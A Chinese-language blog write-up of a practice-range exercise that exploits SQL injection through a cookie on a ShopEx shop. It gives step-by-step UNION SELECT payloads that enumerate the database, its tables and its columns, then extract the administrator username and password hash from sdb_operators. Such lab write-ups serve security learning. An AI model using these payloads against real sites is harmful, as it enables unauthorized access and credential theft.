cookie注入:
burp抓包
![图片[1]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619079649_608131e1b616dc85a7739.png)
几个参数点都有可能存在注入
1.get
2.host都可以注入
![图片[2]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619079893_608132d586cb66c0da2d9.png)
1.确定字段 and 1=2 order by 6 #
and1=2 加再前面 这样前面的就是假的 ,前面为假就不会显示,后面就会显示,不然占显示位
![图片[3]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619079910_608132e66fb2549c9542d.png)
![图片[4]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619079923_608132f3b4430446bfe24.png)
3 是显示位
第一步查数据库的权限
不是root
![图片[5]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080012_6081334c810b9560dfa7a.png)
![图片[6]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080019_60813353df49b29ed3ee6.png)
2.查看哪一个数据库 CNY” and 1=2 union select 1,2,database(),4,5,6#
![图片[7]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080031_6081335fa623a07961841.png)
3.查看数据库版本
and 1=2 union select 1,2,version(),4,5,6#
![图片[8]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080065_6081338123c673aad54fe.png)
4.查数据库shopex中的表名 and 1=2 union select 1,2,table_name,4,5,6 from information_schema.tables where table_schema=’shopex’ #
显示全部表名
and 1=2 union select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=’shopex’ #
当数据库中表很多不知道哪一个是管理员的表时,可以用百度查
在robots.txt中查看敏感文件 管理员目录
![图片[9]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080101_608133a5854cf142930f9.png)
进入后台
![图片[10]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080122_608133ba4b648ff740584.png)
5.查管理员表里面的列名
and 1=2 union select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=’sdb_operators’ #
![图片[11]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080151_608133d7e11f59b507d0c.png)
报出来username userpass
6. 查找管理员账号密码
and 1=2 union select 1,2,username,4,5,6 from sdb_operators #
![图片[12]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080163_608133e3382ca4bebcaa8.png){kind=small}
and 1=2 union select 1,2,userpass,4,5,6 from sdb_operators #
![图片[13]-记一次靶场cookie注入 – 作者:Alan404-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210422/1619080170_608133ea8dbae60f7872b.png)
解密就行了
来源:freebuf.com 2021-04-22 16:24:07 by: Alan404
请登录后发表评论
注册